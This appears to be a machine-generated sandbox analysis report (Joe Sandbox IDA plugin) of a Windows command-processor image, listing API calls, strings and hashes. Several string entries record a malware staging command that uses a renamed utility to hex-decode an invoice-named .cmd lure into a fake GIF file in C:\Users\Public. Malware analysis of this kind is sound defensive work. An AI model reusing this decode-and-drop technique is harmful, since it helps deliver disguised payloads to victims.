                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                      • Instruction ID: cf4d31980cf72856f8e0e6252a37df807f68fc2ceb7b29550c7bc47000b0d00d
                                                                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                      • Instruction Fuzzy Hash: 2CF08135A1864286FBA4AB25F8C0078FBE9FB8DB01B989035D90E23354DF3CE441CB20
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: exit
                                                                                      • String ID:
                                                                                      • API String ID: 2483651598-0
                                                                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                      • Instruction ID: 23f8421869b77d8826dedc186944697a66144715d6c2e9c2f573d99d3b5c811c
                                                                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                      • Instruction Fuzzy Hash: 3FC08C30B0C64687FBBC7B3128D507E99EC6F8C302F84683DCA0B95382DE2CD8088620
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DefaultUser
                                                                                      • String ID:
                                                                                      • API String ID: 3358694519-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
                                                                                      • API String ID: 2221118986-0
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                      • String ID: $Application$System
                                                                                      • API String ID: 3538039442-1881496484
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandlememset$wcschr
                                                                                      • String ID: DPATH
                                                                                      • API String ID: 3260997497-2010427443
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                      • String ID: @P
                                                                                      • API String ID: 1801357106-3670739982
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CloseValue$CreateDeleteOpen
                                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                                      • API String ID: 4081037667-3301834661
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmpwcsrchr
                                                                                      • String ID: COPYCMD
                                                                                      • API String ID: 2429825313-3727491224
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3476366620-0
                                                                                      APIs
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF79374F52A,00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F8DE
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F8FB
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F951
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F96B
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FA8E
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79374FB14
                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FB2D
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FBEA
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79374F996
                                                                                        • Part of subcall function 00007FF793750010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF79376849D,?,?,?,00007FF79376F0C7), ref: 00007FF793750045
                                                                                        • Part of subcall function 00007FF793750010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79376F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF793750071
                                                                                        • Part of subcall function 00007FF793750010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793750092
                                                                                        • Part of subcall function 00007FF793750010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7937500A7
                                                                                        • Part of subcall function 00007FF793750010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793750181
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D401
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D41B
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D435
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D480
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                      • String ID: =,;$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                                      • API String ID: 3964947564-3701919145
                                                                                      • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                      • Instruction ID: 4dea3c7923613abccdd6491e998231a6ebaf1f18d6c0d7ad5f0db015f76b0458
                                                                                      • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                      • Instruction Fuzzy Hash: 02026A21A19A4286FAB8BB31A8C4179E6ADFF4DB55FD44536D90E623A0DF3CB401C731
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$EnvironmentVariable
                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                      • API String ID: 198002717-267741548
                                                                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                      • Instruction ID: 5263a2895660247c5ef798a28a5fe3f884b47812d10c1880a179b9e411a0a438
                                                                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                      • Instruction Fuzzy Hash: 00510F25A0864385FAB46B31A894279EBA8FF4EB81FC49036C90F63764DF2CE544D771
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                      • String ID: "$=,;
                                                                                      • API String ID: 3545743878-4143597401
                                                                                      • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                      • Instruction ID: b2e8960b1b37de8069ba7c188ce3c53e5b98225d36385220c2ea773aaba1f50d
                                                                                      • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                      • Instruction Fuzzy Hash: 75C1B165A0865282FBB57B219488379F6EAFF4DF45F848035CA8E22395EF3CB441C661
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentFormatMessageThread
                                                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                      • API String ID: 2411632146-3173542853
                                                                                      • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                      • Instruction ID: 839b4f0b11dd784be5f14a2565ee4eb5a06ecd06e0bc2966d1d6d0ecd16d73fa
                                                                                      • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                      • Instruction Fuzzy Hash: 1C616171A09A4281EAB4EF71A4945B9E3A8FF4CBA8FC40136D94E27758CF3CE5449721
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3829876242-3916222277
                                                                                      • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                      • Instruction ID: f74f4187c6f01b74b919726324bf5bc98042b06e2d1198d26df1afce5a0f0dfb
                                                                                      • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                      • Instruction Fuzzy Hash: 3E619431A04A4286E7A4AB21D49427AF6A9FF8DB59F848134DE0E17395DF3CE504CB61
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                      • String ID: 0123456789$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                                      • API String ID: 1606811317-2023537263
                                                                                      • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                      • Instruction ID: 6a11af5e192d5167642d07bf9d92b74f989022096ea8c97ab3a2c47d625a1273
                                                                                      • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                      • Instruction Fuzzy Hash: 1FD1A121A08A4282F6B4AB35A8C4279A7A9FF49790FC44136DE5D637A5DF3CE506C720
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorLast$InformationVolume
                                                                                      • String ID: %04X-%04X$~
                                                                                      • API String ID: 2748242238-2468825380
                                                                                      • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                      • Instruction ID: 223338f66ac182b6fe253580f4344d528b3ec1d2c9ac7d103a6c1a589678a358
                                                                                      • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                      • Instruction Fuzzy Hash: DCA1A562708BC18AEFB5AF30D8902E9B7A9FB89785F804035D94E5BB49DF3CD6058710
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                      • String ID: FAT$~
                                                                                      • API String ID: 2238823677-1832570214
                                                                                      • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                      • Instruction ID: 8198e4c48b72c774af3f6fc8436c78d9fbe41a1efb4169172e41073dcd264beb
                                                                                      • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                      • Instruction Fuzzy Hash: 82718E32709BC289EBB5AF3198842E9B7A9FB49785F804035DA4D5BB58DF38D2458710
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D884
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D89D
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D94D
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D964
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF79374DB89
                                                                                      • wcstol.MSVCRT ref: 00007FF79374DBDF
                                                                                      • wcstol.MSVCRT ref: 00007FF79374DC63
                                                                                      • memmove.MSVCRT ref: 00007FF79374DD33
                                                                                      • memmove.MSVCRT ref: 00007FF79374DE9A
                                                                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374DF1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                      • String ID:
                                                                                      • API String ID: 1051989028-0
                                                                                      • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                      • Instruction ID: fab455fc017ba02eb177592615c39f33e4931f2539932c807144c67c8ef4e253
                                                                                      • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                      • Instruction Fuzzy Hash: DF028532A0879181FBB46F24E488279F6AAFB49B94F944235DADD23795DF3CE441C720
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937558E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF79376C6DB), ref: 00007FF7937558EF
                                                                                        • Part of subcall function 00007FF79375081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79375084E
                                                                                      • towupper.MSVCRT ref: 00007FF79376C1C9
                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79376C31C
                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF79376C5CB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                      • String ID: %s $%s>$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 $PROMPT$Unknown$\$x
                                                                                      • API String ID: 2242554020-112758507
                                                                                      • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                      • Instruction ID: 5770d6c6104dd53b61e9f910846d888cf562292dd75a5cb9a66430980dd53fab
                                                                                      • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                      • Instruction Fuzzy Hash: 6612B625A08A4381EAB4BB3594A417AB7A8EF4CB94FD40236D95E637E4CF3DE501C721
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                      • String ID: \\.\
                                                                                      • API String ID: 799470305-2900601889
                                                                                      • Opcode ID: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                      • Instruction ID: 78fcfda04d286d8d36307b4547c840b4ee343c0d416eac75f61e97e796b4fb34
                                                                                      • Opcode Fuzzy Hash: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                      • Instruction Fuzzy Hash: 6C51C632A08AC2D5EBB4AF3098802B9B7A8FB8DB44F854432DA0E57794DF3CD5458360
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937454DE
                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79374552B
                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79374554F
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79376345F
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79376347E
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF7937634C3
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937634DB
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF7937634FA
                                                                                        • Part of subcall function 00007FF7937536EC: _get_osfhandle.MSVCRT ref: 00007FF793753715
                                                                                        • Part of subcall function 00007FF7937536EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793753770
                                                                                        • Part of subcall function 00007FF7937536EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753791
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1356649289-0
                                                                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                      • Instruction ID: c000d74624fd621b7466c00a574dfc986b737c201593487bc6bb37929b778517
                                                                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                      • Instruction Fuzzy Hash: 6B917F21A08A4687F6B4AF31A494179F6E9FB8CB95F844135DA4E537A1DF3CE440CB20
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                      • String ID: :$\
                                                                                      • API String ID: 3961617410-1166558509
                                                                                      • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                      • Instruction ID: fa47087e754129d80a86fc7e85d01821bd6395d66f91e657b4b3b4f8eceb8644
                                                                                      • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                      • Instruction Fuzzy Hash: FF216021A0C64287F7F07B70A4C81B9F6A6EB4DB95BC48135D91F92390DF3CE5458A61
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                      • API String ID: 2516562204-381716982
                                                                                      • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                      • Instruction ID: aa7d0cb0eac1dd73118cf42449474f98e79b04eaa4e146037dd7c3d2932e6f8f
                                                                                      • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                      • Instruction Fuzzy Hash: 5CC1B332A1475186EBA4AF35E88027DB7A9FB48B95F841135DE8E23B94DF3CE451C710
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                      • API String ID: 1580871199-2613899276
                                                                                      • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                      • Instruction ID: 1921bc16ed3cf21867fa327457d1339c8256a6163ee221cf4e34f866a4cf1b5e
                                                                                      • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                      • Instruction Fuzzy Hash: 9551D671A18B8282EBB09B35E890179B7B8FB8CB85F845135DA5E23744DF3CD501C761
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                      • String ID: con
                                                                                      • API String ID: 689241570-4257191772
                                                                                      • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                      • Instruction ID: 4f2d9c250f1c328cb953fb397fb5bc3b1e5c410440253738f46b4d7f91ead79a
                                                                                      • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                      • Instruction Fuzzy Hash: EE41C731A08B4586E260AF25A484379FA99F74DBA5F958334DA6E233D0CF3CD949C750
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                      • String ID:
                                                                                      • API String ID: 3192234081-0
                                                                                      • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                      • Instruction ID: 0ff2e558aa32c9a2f44fb95e8a05f1cbb21c371eb831963e6b91deebce412738
                                                                                      • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                      • Instruction Fuzzy Hash: B931AF31708A418BF7A0AF31A48467DFBA5FB8DB85F849134DE8A57791CE3CE4018B10
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                      • String ID:
                                                                                      • API String ID: 920682188-0
                                                                                      • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                      • Instruction ID: 60605cfaa44b2aa2c4fd0b36cf9ab0f546ef366af94a0034af23d099fcbf00aa
                                                                                      • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                      • Instruction Fuzzy Hash: E3512732705B818AEB75EF20D8942E8B7A5FB8CB85F848135CA4E57754DF3CD6458720
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcsspn
                                                                                      • String ID:
                                                                                      • API String ID: 3809306610-0
                                                                                      • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                      • Instruction ID: 2dafa4c9f4fa41df8e9d50d18ab67f79814cd1a48ef63879ecfecb84a0e62c57
                                                                                      • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                      • Instruction Fuzzy Hash: FEB19662A0874681EAA4EF25E490279E7A9FB5CB80FC58032DA4E67791DF7CE441C720
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: wcschr$iswdigit$wcstol
                                                                                      • String ID:
                                                                                      • API String ID: 3841054028-0
                                                                                      • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                      • Instruction ID: 72775493c192d36715b9cc2eecc7d2580efb2e91c676251f7f62ccced9c8acc1
                                                                                      • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                      • Instruction Fuzzy Hash: CE510723A04A52A1F7B4AB35D4A01B9B6A5FF6C759BC48231DE5D622D0DF3CE841C231
                                                                                      APIs
